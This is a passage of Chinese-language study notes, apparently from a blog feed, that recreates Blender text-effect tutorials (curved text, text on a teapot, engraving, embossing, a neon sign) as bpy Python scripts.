    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    cube_modifier_boolean.operation = "UNION"

    Engrave or Carve Text On Curved Surface | Part 4 in Text Effects | Blender Eevee & Cycles

    1. 新建一个圆柱体:

    png

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    png

    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

    png

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    png

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    1. 新建一个文本对象:

    png

    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    png

    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"
    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75

    png

    bpy.ops.object.convert(target="MESH")

    png

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    png

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2

    png

    png

    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True

    png

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    png

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"

    png

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    png

    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)

    完整代码:

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"

    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2


    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)

    Emboss Any Text On Curved Surface | Bend Any Text | Part 5 in Text Effects | Blender Eevee & Cycles

    1. 新建一个圆柱体。

    png

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object
    1. 添加 Edgesplit,并应用,分离边:

    png

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")
    1. 添加 Subdivision,并应用,使得物体更平滑:

    png

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    1. 新建一个 Text,调整其参数:

    png

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    设置文字内容:

    png

    text_obj.data.body = "Hello,\nWorld!"

    png

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    png

    text_obj.data.size = 0.5
    1. 添加一个 Solidify 修改器,挤出 0.15 m:

    png

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15
    1. Text 转成 Mesh

    png

    bpy.ops.object.convert(target="MESH")
    1. Remesh 处理:

    png

    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
    1. Decimate处理以减少边的数量:

    png

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    1. 平滑处理:

    png

    png

    png

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True
    1. 新建一个 Empty,位置和 Text 相同,用于文本弯曲:

    png

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2
    1. 设置 SimpleDeform,使 Text 弯曲:

    png

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"
    1. 形成浮雕有一个简单的方法:ObjectJoin

    png

    1. 如果不用 Join,改用 Boolean 运算:

    png

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj
    1. 添加 Bevel 使得斜角效果:

    png

    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True
    text_obj.hide_viewport = True
    text_obj.hide_render = True
    1. 如果有破,只能自己拿工具填边了:

    png


    完整代码:

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.size = 0.5

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15

    bpy.ops.object.convert(target="MESH")

    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj

    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    Neon Light or Neon Sign In Blender | Easy & Realistic Method For Blender Eevee (All Versions)

    1. 新建一个 Text 对象,调整其参数:

    png

    png

    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2
    1. 修改文字:

    png

    text_obj.data.body = "BARBEQUE\nNATION"
    1. Neon Future Font | dafont.com 找一个适合霓虹灯的字体,应用之:

    png

    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)
    1. 设置 extrude

    png

    text_obj.data.extrude = 0.02
    1. 添加一个 emission 的材质,设置参数:

    png

    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)
    1. 设置 scene 里的 Bloom

    png

    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25
    1. 新建一个 plane,用于接受霓虹灯的光线:

    png

    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25
    1. 从网上找一张贴图,给这个 plane 一个贴图的纹理:

    png

    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))
    1. 调整其 shader nodes,翻转贴图:

    png

    png

    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)
    1. 添加环境光探针,大小包围平面和文字:

    png

    bpy.ops.object.lightprobe_add(type="GRID")
    1. 将 Light Probe 的大小包围屏幕和文字:

    png

    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]
    1. Bake Cubemap Only

    png

    1. 调低背景亮度,Screen Space Reflections

    png

    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True
    1. 添加点光源,补充亮度:

    png

    png

    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5

    完整代码:

    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2

    text_obj.data.extrude = 0.02

    text_obj.data.body = "BARBEQUE\nNATION"
    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)

    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)

    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25

    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25

    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))

    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)

    bpy.ops.object.lightprobe_add(type="GRID")
    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]

    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True

    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5
    ]]>
    + 资源

    课程

    Linux 下安装 bpy

    Releases · TylerGubala/blenderpy (github.com) 下载静态安装包,然后:

    1
    pip install bpy-2.91a0-cp37-cp37m-manylinux2014_x86_64.whl && bpy_post_install

    Create Curved Text In Blender | Bend Any Text | Part 1 in Text Effects | Two Easy Methods Explained

    创建文本对象

    1. 创建一个 Text 对象:

    png

    1
    2
    3
    4
    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object
    1. 将这个 Text 对象的 Rotation XZ 设为 90°

    png

    1
    2
    3
    4
    import numpy as np

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    1. 将文字设为居中对齐:

    png

    1
    2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    1. 将这个 TextGeometryExtrude 设为 0.1 m,使其具有厚度。

    png

    1
    text_obj.data.extrude = 0.1
    1. 切换到 Edit Mode,可以更改其文字内容。

    png

    1
    text_obj.data.body = "Hello,\nWorld!"

    直接弯曲

    1. Text 对象添加一个 Simple DeformModifier

    png

    1
    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")
    1. 设置其属性:

    png

    1
    2
    3
    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4

    得到弯曲后的文本:

    png


    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")

    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4

    沿 Bezier 曲线弯曲

    1. 新建一个 Circle 对象,将其 Rotation Z 设为 90°

    png

    1
    2
    3
    4
    bpy.ops.curve.primitive_bezier_circle_add()
    curve_obj = bpy.context.object

    curve_obj.rotation_euler[2] = np.pi / 2
    1. Text 对象添加一个 Modifier,选择 Curve,然后选择之前新建的 BezierCircle 对象:

    png

    1
    2
    curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
    curve_modifier.object = curve_obj

    此时 Text 对象就会沿着 BezierCircle 曲线变形:

    png

    1. 选中 BezierCircle 对象,切换到 Edit Mode,选择 SegmentsSwitch Direction,便可切换文字方向:

    png

    1
    2
    3
    bpy.ops.object.editmode_toggle()
    bpy.ops.curve.switch_direction()
    bpy.ops.object.editmode_toggle()
    1. 修改 BezierCircleScaleText 对象也会随之变化:

    png

    1
    curve_obj.delta_scale[0:3] = [2, 2, 2]

    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    import bpy
    import numpy as np

    # 新建一个 TextCurve 对象
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    # 修改文本位置和旋转角度
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    # 修改文本对齐方式
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    # 挤出文本
    text_obj.data.extrude = 0.1

    # 设置文本内容
    text_obj.data.body = "Hello,\nWorld!"

    # 创建一个圆形对象
    bpy.ops.curve.primitive_bezier_circle_add()
    curve_obj = bpy.context.object

    # 旋转该圆形对象
    curve_obj.rotation_euler[2] = np.pi / 2

    # 让文本沿着圆形变换
    curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
    curve_modifier.object = curve_obj

    # 修改方向
    bpy.ops.object.editmode_toggle()
    bpy.ops.curve.switch_direction()
    bpy.ops.object.editmode_toggle()

    # 修改圆形大小
    curve_obj.delta_scale[0:3] = [2, 2, 2]

    Add Text To Any Curved Surface In Blender | Part 2 in Text Effects | Blender Eevee & Cycles

    1. 新建一个茶壶:
    1
    2
    3
    4
    5
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_teapot_add()
    teapot_obj = bpy.context.object
    1. 新建一个文本对象,设置其对齐、位置(使其靠近茶壶表面)、旋转、挤出、文字内容、行间距等:

    png

    png

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.location[1] = -2
    text_obj.location[2] = 1.5

    text_obj.rotation_euler[0] = np.pi / 2

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.space_line = 0.75
    1. 给文字对象添加一个红色的材质,此时转到渲染窗口,文字就会呈现红色:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    text_material = bpy.data.materials.new(name="TextMaterial")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

    text_obj.data.materials.append(text_material)
    1. 新建一个 EmptyCube,设置其位置使其和 Text 相同,设置其旋转角,用于控制 Text 的旋转:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[1] = -2
    empty_obj.location[2] = 1.5

    empty_obj.rotation_euler[0] = np.pi / 2
    empty_obj.rotation_euler[2] = np.pi / 2
    1. Text 对象添加 modifier:
    • Remesh:用于使字体集合与弯曲操作兼容,选择 SharpOctree Depth 设为 8

    png

    1
    2
    3
    4
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
    • SimpleDeform:用于字体弯曲,选择 BendOrigin 选择 Empty 对象,Axis 选择 Y 轴:

    png

    1
    2
    3
    4
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.deform_axis = "Y"
    • Shrinkwrap:使得文字映射到 teapot 上,Wrap Method 选择 Target Normal ProjectTarget 选择 Teapot 对象,Offset 选择 0.1 m:

    png

    1
    2
    3
    4
    text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
    text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
    text_modifier_shrink_wrap.target = teapot_obj
    text_modifier_shrink_wrap.offset = 0.1

    png


    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    import bpy
    import numpy as np

    # 新建 teapot 对象
    bpy.ops.mesh.primitive_teapot_add()
    teapot_obj = bpy.context.object

    # 新建 text 对象
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    # 居中对齐
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    # 设置位置
    text_obj.location[1] = -2
    text_obj.location[2] = 1.5

    # 设置旋转角
    text_obj.rotation_euler[0] = np.pi / 2

    # 设置挤出举例
    text_obj.data.extrude = 0.1

    # 设置文本内容
    text_obj.data.body = "Hello,\nWorld!"

    # 设置行间距
    text_obj.data.small_caps_scale = 0.75

    # 新建材质
    text_material = bpy.data.materials.new(name="TextMaterial")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

    # 给文本添加材质
    text_obj.data.materials.append(text_material)

    # 新建 empty 对象
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    # 设置 empty 位置
    empty_obj.location[1] = -2
    empty_obj.location[2] = 1.5

    # 设置 empty 旋转角
    empty_obj.rotation_euler[0] = np.pi / 2
    empty_obj.rotation_euler[2] = np.pi / 2

    # 新建 Remesh 的 modifier
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False

    # 新建 SimpleDeform 的 modifier
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.deform_axis = "Y"

    # 新建 Shrinkwrap 的 modifier
    text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
    text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
    text_modifier_shrink_wrap.target = teapot_obj
    text_modifier_shrink_wrap.offset = 0.1

    Engrave & Emboss Text Easily In Blender | Part 3 in Text Effects | Create 3D Text Logo In Blender

    1. 新建一个 Cube,并调整其 Scale

    png

    1
    2
    3
    4
    5
    6
    7
    8
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5
    1. 新建一个 Text,调整其 Transform

    png

    1
    2
    3
    4
    5
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    使其居中对齐:

    png

    1
    2
    3
    4
    5
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    设置文字内容:

    png

    1
    text_obj.data.body = "Hello,\nWorld!"
    1. 修改完文字内容后,将其转换成 Mesh,随后文字内容就不能再改变!

    png

    1
    bpy.ops.object.convert(target="MESH")
    1. 应用 Decimate 以减少过多的顶点:

    png

    1
    2
    3
    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    1. Edit Mode 下,选择 Text 对象下的所有顶点,MeshMergeBy Distance

    png

    在对话框中选择 0.01 m。

    png

    1
    2
    3
    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    1. MeshDeleteLimited Dissolve

    png

    在对话框中选择 Max Angle10°

    png

    1
    2
    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()
    1. Text 添加一个 Solidfy,使其具有高度:

    png

    1
    2
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2
    1. Object Mode 下,给 TextCude 使用 Shade Smooth

    png

    png

    png

    1
    2
    3
    4
    5
    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True
    1. Cude 添加 Boolean,关闭 Text 的显示,形成雕刻效果:

    png

    1
    2
    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    1. Cude 添加 Bevel,形成斜角效果:

    png

    1
    2
    3
    4
    5
    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True
    1. Boolean 改为 Union,形成浮雕效果:

    png

    1
    cube_modifier_boolean.operation = "UNION"

